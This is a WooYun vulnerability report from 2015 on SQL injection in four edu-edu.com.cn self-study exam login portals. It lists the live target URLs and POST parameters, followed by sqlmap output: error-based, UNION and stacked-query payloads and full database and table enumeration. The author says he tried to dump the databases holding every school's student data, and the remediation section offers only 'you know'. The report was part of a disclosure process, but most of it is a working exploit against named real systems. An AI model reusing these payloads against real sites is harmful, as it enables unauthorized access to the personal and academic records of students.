当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128159

漏洞标题:某教育网一组通用SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: qqdaxingxing

提交时间:2015-07-24 15:00

修复时间:2015-09-12 09:44

公开时间:2015-09-12 09:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-29: 厂商已经确认,细节仅向厂商公开
2015-08-08: 细节向核心白帽子及相关领域专家公开
2015-08-18: 细节向普通白帽子公开
2015-08-28: 细节向实习白帽子公开
2015-09-12: 细节向公众公开

简要描述:

由华夏大地教育网提供技术支持的高等教育自学考试网络助学综合评价支持平台存在多处SQL漏洞

详细说明:

总共有4个不同域名,但是某些同一域名下不同文件名区分了不同学校

11.png


1二.png


1三.png


1四.png


所以趴下来的库是包含所有学校的,小牛我也是拖了好久都没脱完,于是只列出表了
下面是注入链接:
http://jxilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=6&STUDENT_TYPE=2&RANDCODE=696c
http://hbilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYPE=2&RANDCODE=m3v2
http://ilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE=1&RANDCODE=7zrm
http://hnilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TYPE=1&CREDIT=0&RANDCODE=78f7

漏洞证明:

http://jxilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=6&STUDENT_TYPE=2&RANDCODE=696c
---
Place: GET
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHER
Payload: r=teach/student/index' AND (SELEC
(0x3a6e69683a,(SELECT (CASE WHEN (2309=2309) T
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARA
='THrP&
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHER
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCR
=2&RANDCODE=696c' AND (SELECT 5078 FROM(SELECT
ECT (CASE WHEN (5078=5078) THEN 1 ELSE 0 END))
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
---
there were multiple injection points, please s
injections:
[0] place: POST, parameter: RANDCODE, type: Si
[1] place: GET, parameter: r, type: Single quo
[q] Quit
>
[16:34:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP
back-end DBMS: MySQL 5.0
[16:34:08] [INFO] fetching database names
[16:34:08] [INFO] the SQL query used returns 4
[16:34:08] [INFO] resumed: information_schema
[16:34:08] [INFO] resumed: jxtiger
[16:34:08] [INFO] resumed: test
[16:34:08] [INFO] resumed: tiger2010
available databases [4]:
[*] information_schema
[*] jxtiger
[*] test
[*] tiger2010
[16:34:08] [INFO] fetching tables for database
est, tiger2010'
[16:34:08] [INFO] the SQL query used returns 2
Database: jxtiger
[92 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_jx_fwzx_score |
| edu_jx_stu_newscore |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| sun |
| temp_stu_steptest_score |
+---------------------------------------+
Database: tiger2010
[86 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[16:34:10] [INFO] fetched data logged to text
tput\jxilearning.edu-edu.com.cn'
===========================================================================
http://hbilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYPE=2&RANDCODE=m3v2
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=teach/student/index' AND (SELECT 5121 FROM(SELECT COUNT(*),CONCAT
(0x3a6a636f3a,(SELECT (CASE WHEN (5121=5121) THEN 1 ELSE 0 END)),0x3a7162653a,FL
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HACE'
='HACE&
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYP
E=2&RANDCODE=m3v2' AND (SELECT 2063 FROM(SELECT COUNT(*),CONCAT(0x3a6a636f3a,(SE
LECT (CASE WHEN (2063=2063) THEN 1 ELSE 0 END)),0x3a7162653a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NqRo'='NqRo
Place: POST
Parameter: SCHOOL_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12 AND (SELECT
8455 FROM(SELECT COUNT(*),CONCAT(0x3a6a636f3a,(SELECT (CASE WHEN (8455=8455) TH
EN 1 ELSE 0 END)),0x3a7162653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARAC
TER_SETS GROUP BY x)a)&STUDENT_TYPE=2&RANDCODE=m3v2
Type: UNION query
Title: MySQL UNION query (NULL) - 23 columns
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12 LIMIT 0,1 U
NION ALL SELECT NULL,CONCAT(0x3a6a636f3a,0x54766d70476d48736641,0x3a7162653a),NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL#&STUDENT_TYPE=2&RANDCODE=m3v2
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12; SELECT SLE
EP(5)-- &STUDENT_TYPE=2&RANDCODE=m3v2
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: RANDCODE, type: Single quoted string (default)
[1] place: GET, parameter: r, type: Single quoted string
[2] place: POST, parameter: SCHOOL_ID, type: Unescaped numeric
[q] Quit
>
[16:37:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP 5.2.9
back-end DBMS: MySQL 5.0
[16:37:29] [INFO] fetching database names
[16:37:29] [INFO] the SQL query used returns 4 entries
[16:37:29] [INFO] resumed: information_schema
[16:37:29] [INFO] resumed: jxtiger
[16:37:29] [INFO] resumed: test
[16:37:29] [INFO] resumed: tiger2010
available databases [4]:
[*] information_schema
[*] jxtiger
[*] test
[*] tiger2010
[16:37:29] [INFO] fetching tables for databases: 'information_schema, jxtiger, t
est, tiger2010'
[16:37:30] [INFO] the SQL query used returns 215 entries
Database: jxtiger
[92 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_jx_fwzx_score |
| edu_jx_stu_newscore |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| sun |
| temp_stu_steptest_score |
+---------------------------------------+
Database: tiger2010
[86 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[16:37:31] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\hbilearning.edu-edu.com.cn'
================================================================================
http://ilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE=1&RANDCODE=7zrm
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE
=1&RANDCODE=7zrm' AND (SELECT 2622 FROM(SELECT COUNT(*),CONCAT(0x3a6f626d3a,(SEL
ECT (CASE WHEN (2622=2622) THEN 1 ELSE 0 END)),0x3a7172683a,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nunb'='nunb
Place: GET
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=teach/student/index' AND (SELECT 9249 FROM(SELECT COUNT(*),CONCAT
(0x3a6f626d3a,(SELECT (CASE WHEN (9249=9249) THEN 1 ELSE 0 END)),0x3a7172683a,FL
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mwKD'
='mwKD&
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: RANDCODE, type: Single quoted string (default)
[1] place: GET, parameter: r, type: Single quoted string
[q] Quit
>
[16:43:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP 5.2.9
back-end DBMS: MySQL 5.0
[16:43:16] [INFO] fetching database names
[16:43:16] [INFO] the SQL query used returns 4 entries
[16:43:16] [INFO] resumed: information_schema
[16:43:16] [INFO] resumed: test
[16:43:16] [INFO] resumed: tiger2010
[16:43:16] [INFO] resumed: tiger_bak
available databases [4]:
[*] information_schema
[*] test
[*] tiger2010
[*] tiger_bak
[16:43:16] [INFO] fetching tables for databases: 'information_schema, test, tige
r2010, tiger_bak'
[16:43:16] [INFO] the SQL query used returns 213 entries
Database: tiger2010
[90 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_cdcard |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: tiger_bak
[86 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
[16:43:17] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\ilearning.edu-edu.com.cn'
================================================================================
http://hnilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TYPE=1&CREDIT=0&RANDCODE=78f7
---
Place: GET
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=teach/student/index' AND (SELECT 2734 FROM(SELECT COUNT(*),CONCAT
(0x3a6e61663a,(SELECT (CASE WHEN (2734=2734) THEN 1 ELSE 0 END)),0x3a6a75703a,FL
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WOzr'
='WOzr&
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TY
PE=1&CREDIT=0&RANDCODE=78f7' AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x3a6e
61663a,(SELECT (CASE WHEN (4760=4760) THEN 1 ELSE 0 END)),0x3a6a75703a,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'jJBZ'='jJBZ
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: RANDCODE, type: Single quoted string (default)
[1] place: GET, parameter: r, type: Single quoted string
[q] Quit
>
[16:58:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP 5.2.9
back-end DBMS: MySQL 5.0
[16:58:59] [INFO] fetching database names
[16:58:59] [INFO] the SQL query used returns 3 entries
[16:58:59] [INFO] resumed: information_schema
[16:58:59] [INFO] resumed: hnilearn
[16:58:59] [INFO] resumed: test
available databases [3]:
[*] hnilearn
[*] information_schema
[*] test
[16:58:59] [INFO] fetching tables for databases: 'hnilearn, information_schema,
test'
[16:58:59] [INFO] the SQL query used returns 128 entries
Database: hnilearn
[91 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_autogetschdata_log |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_cdcard |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[16:59:00] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\hnilearning.edu-edu.com.cn'

修复方案:

你懂得

版权声明:转载请注明来源 qqdaxingxing@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-29 09:43

厂商回复:

最新状态:

暂无


漏洞评价:

评论